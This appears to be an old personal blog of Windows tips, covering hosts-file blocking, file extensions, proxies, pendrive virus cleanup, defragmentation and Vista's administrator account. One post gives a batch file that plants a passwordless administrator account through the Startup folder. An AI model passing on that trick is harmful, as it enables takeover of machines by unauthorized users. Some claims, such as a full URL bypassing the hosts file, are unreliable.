Hello Friends,Sometimes you want to block some websites in your PC which are harmful for your computer,Now you can easily and effectively block access to a website by adding it to your Windows HOSTS file. (Yes, Hosts is capitalized for some strange reason).It is very easy in Use and it is working effectively,below is the trick that how can you Block a website in your PC.

1.Go to your HOSTS file which is located at:
C:\WINDOWS\SYSTEM32\DRIVERS\ETC for windows Vista and XP
C:\WINNT\SYSTEM32\DRIVERS\ETC for Windows 2k
C:\WINDOWS for Windows 98 and ME

2. Open HOSTS with Notepad.

The default Windows HOSTS looks like this:
______________________

# Copyright © 1993-1999 Microsoft Corp.
#
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
#
# This file contains the mappings of IP addresses to host names. Each
# entry should be kept on an individual line. The IP address should
# be placed in the first column followed by the corresponding host name.
# The IP address and the host name should be separated by at least one
# space.
#
# Additionally, comments (such as these) may be inserted on individual
# lines or following the machine name denoted by a “#” symbol.
#
# For example:
#
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
#
127.0.0.1 localhost
_____________________________

3. Directly under the line that says 127.0.0.1 Localhost, you will want to type:

127.0.0.1 name of the URL you want to block

For example to block the MySpace.com homepage (highly recommended!), simply type:

127.0.0.1 myspace.com
127.0.0.1 www.myspace.com

Other parts of MySpace could be blocked in a similar way:

127.0.0.1 search.myspace.com
127.0.0.1 profile.myspace.com
127.0.0.2 www.orkut.com
etc etc etc…

You may need to add sites with both with and without the “www.”. Test after blocking to make sure you got it right.

You can add as many sites as you wish to block in this fashion.


4. Close Notepad and answer “Yes” when prompted.

5. Reboot your computer and attempt to access your now blocked website. You should see a Cannot find server or DNS Error saying: “The page cannot be displayed”.


~NOTE: If a user types in the full url i.e. with the http:// and everything, it wll bypass the hosts file redirection and take them to the right website~
Read rest of entry

Thursday, November 20, 2008

identify unknown file format in ur computer





Managing files is one of the most important things to learn in order to use Windows properly. There is a lot more involved than the basic functions like copy, delete, and move. Unfortunately, the subject is poorly understood by many people. One mystery is file extensions. Another is the annoying things that can happen when new software changes your file associations. Find out what to do about it. Understanding file extensions and knowing how to manage your file associations can be productive in many ways. Learn how here.
What Are Extensions and What Do They Do?
You will recall that in the Windows operating system, most files have names with the format filename.ext where .ext is the extension. An extension is not absolutely required but most files have one in their name. Extensions are often, but not necessarily, three characters. Their function is to tell the computer what the file type is and what is to be done with the file when it is opened or double-clicked or otherwise invoked one way or the other. When the operating system is presented with a file for action (e.g., when you double-click it), the Registry is consulted where a list of file types and their extensions is kept. The list contains what actions are possible for that particular file, which software is supposed to carry out the action, and where on the computer that software is located (the path).
By being aware of the role of an extension, a user can make intelligent decisions about how (or whether) to use a file. For example, e-mail viruses are usually spread by means of attachments with one of the executable extensions such as .exe, .vbs or .scr. An informed user will be able to recognize the danger in indiscriminately opening such attachments and will be prepared to take appropriate action.
Unfortunately,there are thousands of file extensions. Although most of us encounter only a few of the common ones, there are times when you might need to look up a particular file extension. Because file extensions are so important, the Web is full of lists that explain the many different extensions.

Here’s a few (in no particular order):

file-format
Wikipedia
FileExt
File.Extensions
Webopedia

http://www.whatisthatfile.com/
Read rest of entry

Broadband Tweak To Boost Up Internet Speed




This is for broad band connections. I didn’t try it on dial up but might work for dial up.
1.make sure your logged on as actually "Administrator". do not log on with any account that just has administrator privileges.
2. start - run - type gpedit.msc
3. expand the "local computer policy" branch
4. expand the "administrative templates" branch
5. expand the "network branch"
6. Highlight the "QoS Packet Scheduler" in left window
7. in right window double click the "limit reservable bandwidth" setting
8. on setting tab check the "enabled" item
9. where it says "Bandwidth limit %" change it to read 0
reboot if you want to but not necessary on some systems your all done. Effect is immediate on some systems. some need re-boot. I have one machine that needs to reboot first, the others didn't. Don't know why this is.

This is more of a "counter what XP does" thing. In other words, XP seems to want to reserve 20% of the bandwidth for its self. Even with QoS disabled, even when this item is disabled. So why not use it to your advantage. To demonstrate the problem with this on stand alone machines start up a big download from a server with an FTP client. Try to find a server that doesn't max out your bandwidth. In this case you want a slow to medium speed server to demonstrate this. Let it run for a couple of minutes to get stable. The start up another download from the same server with another instance of your FTP client. You will notice that the available bandwidth is now being fought over and one of the clients download will be very slow or both will slow down when they should both be using the available bandwidth. Using this "tweak" both clients will have a fair share of the bandwidth and will not fight over the bandwidth.
Read rest of entry

Create An Admin Account using guest account



"donot misuse it"
Step 1: Open up Notepad, copy and paste the following code into it and save the file as admin.bat. (You could actually give it any name, just make sure that the extension is .bat)
@echo off
net user Newadmin /add /expires:never /passwordreq:no
net localgroup “Administrators” /add Newadmin

Step 2: Copy the file to the Startup folder. Here is the path to the Startup folder:
C:\Documents and Settings\All Users\Start Menu\Programs\Startup
Step 3: There is no step 3.
The next time the admin logs on into the computer, the batch file runs and the admin account is created. Once the admin logs off, you can log in using the username newadmin and without any password.
Remember that it wouldn’t take long for the real admin to find out that a new admin account has been created.
Read rest of entry

anonymous surfing using firefox




computers in internet are identified thru ip addresses which are unique to each system
. These are similar to our real world postal address or like our cellphone number.
we donot wish to give either our cell no or our address to an intruder.
In the same manner hiding ur ip address in the net has got utmost importance.
why iam i saying all this is bcoz usually if any hacker gets some working ip address he portscans the computers looking for any open ports("they are like doors of our house in te real world we dont want our doors kept open in the night am i right") on our system .if he finds any open port he will try to hack by sending some trojans disguised as updates to antivirus. so if we hide our ip address then no one ever gets our ip thus v are secure to do this v hav to browse the net thru a proxy server .they are like masks protecting our anonymity they give away their ip instead of ours thus protecting us .This is also one of the common methods used by hackers to secure their identity from being caught by fbi or interpol .....................

firefox serves as an excellent tool for staying anonymous on this cyberworld.


With this you can:


a) download as many time you like using Rapidshare.de


b) Use Megaupload if your country slot is limited.


c) Enhance your privacy (no one can see who are you)


d) Avoid hacker


e) Download faster (some proxies containe internet cache)


To get free proxies, go here


How to setup proxy:

Older Version: Go to tools>option>general>connectionsettings

Latest Version: Go to tools>options>advanced>network>settings

click the manual settings radio button and enter the ip address and port number given in the above site
Read rest of entry

windows xp shortcuts for newbies



Read rest of entry

Tuesday, November 18, 2008

securing a system from pendrive/flash drive virus





Today pendrives are becoming popular for their portability and high capacity.
As every coin has 2 sides we know that these devices are being used to spread virii rapidly as most of the viruses are targeted to the pendrives..

Active viruses infect your windows system as soon as you double click on the Pen Drive icon in your my computer. As virus always creates a autorun.inf file which is a system ,hidden and a read only file on your pen drive. It point to the main virus file which is also located on the pen drive. When user double clicks on the pen drive files pointed by the autorun.inf got executed which copies the virus files on your system.

tips to defend ourselves from pendrive viruses

Click Start

-->> click on Run or press windows key + r

* Enter GPEDIT.MSC press enter

* Double-click Computer Configuration to open submenu

* Double-click Administrative Templates to open submenu

* Double-click System to open submenu

* Double-click Turn autoplay off option which will be near the bottom of the list in
the right panel.

and u hav 2 tweak ur settings a bit to delete the pesky virus present in your pendrive

Open My Document> Tools> Folder Options>View or control panel folder options>view

click on Advanced Setting

Files and folders > Hidden files and folders

Enable the Show hidden files and folders

deselect hide extensions for known file types

now we are ready to rock

goto run or command prompt

type the drive name

eg: type g:\ in run

now ur pen drive will open up .

look for any files with doubles extensions such as hai.jpg.exe or

ps.bat or any files which u feel are doubtful

select all of them and press shift+delete



removing thru registry

1.New Folder.exe virus disables task manager, disables registry editor, disables folder options, and disables run option from start menu. Virus creates exe files like the icon of folders with the same name as the name of the folder, it also consumes more than 50 % of your processor usage so slows down your computer.



Let’s see how we can remove this virus without formatting the drive.


Fix:

In order to remove the newfolder.exe

You need delete a file named svichossst.exe where ever you find this file on your system



Remove the following keys from registry

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
“@”=[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
“Yahoo Messengger”=



[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
“Shell”=”Explorer.exe “




-------------------------------------------------------------------------------------


when we autoplay cds there may e chance that our system gets infected
hence disabling cd-autorun from registry is the best bet to protect ourselves

copy the below code to a notepad and save it as any file but with .reg extension and after saving double click it

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\CDRom]
"Autorun"="0"


-------------------------------------------------------------------------------------
Read rest of entry

trick to defrag mutliple volumes in windows vista without using any third party software





By default windows vista provides a defragmentor which can defrag one drive at a time which ofcourse takes a lot of time.
Here is a trick to defrag mutliple drives in ur system at once.
To do this we hav to create a batch file to defragment all drives one after other.
the disk defrag utility can be invoked from the comand line with the following syntax:

Windows Disk Defragmenter
Copyright (c) 2001 Microsoft Corp. and Executive Software International, Inc.
Usage:

defrag
[-a] [-f] [-v] [-?]

volume drive letter or mount point (d: or d:volmountpoint)
-a Analyze only
-f Force defragmentation even if free space is low
-v Verbose output
-? Display this help text

first of all we create a bat file by name tuneall.bat
and place it anywhere you like, as long as you'll remember where it is. If you want to run it from the command line, you could place it in the \windows directory so that it will be available in the system path.

For each hard drive, add a line to the batch file. For instance, if we want to defragment drives C: , D: , and F: we will add these three lines:

defrag c: -f defrag d: -f defrag f: -f

To run the defrag, just either double-click on the batch file or start it from the command
Read rest of entry

Sunday, November 16, 2008

unlock the hidden administrator account in vista





Many of us who are familiar with prior versions of Windows are curious what happened to the built-in Administrator account which was always created by default. Does this account still exist, and how can you access it?

The account is created in Windows Vista, but since it's not enabled you can't use it. If you are troubleshooting something that needs to run as administrator, you can enable it with a simple command.

Note: You really shouldn't use this account for anything other than troubleshooting. In fact, you probably shouldn't use it at all.

Enable Built-in Administrator Account

First you'll need to open a command prompt in administrator mode by right-clicking and choosing "Run as administrator" (or use the Ctrl+Shift+Enter shortcut from the search box)

Now type the following command:

net user administrator /active:yes

yes u r done now logout and u can see that account enabled

You'll note that there's no password for this account, so if you want to leave it enabled you should change the password.

steps to set password for administrator acc using command prompt

goto run---->cmd and press enter
now type c:\ net user administrator bond
here bond is the password and u can give password of ur choice

this account is like root acc or superuser in unix or linux enviroment using this acc is not recommended for users other than admins

Disable Built-in Administrator Account

Make sure you are logged on as your regular user account, and then open an administrator mode command prompt as above. Type the following command:

net user administrator /active:no

and u r done

caution:donot messup with that administrator account i repeat



Read rest of entry
 

Computers made easy 4all Copyright © 2009 Gadget Blog is Designed by Ipietoon Sponsored by Online Business Journal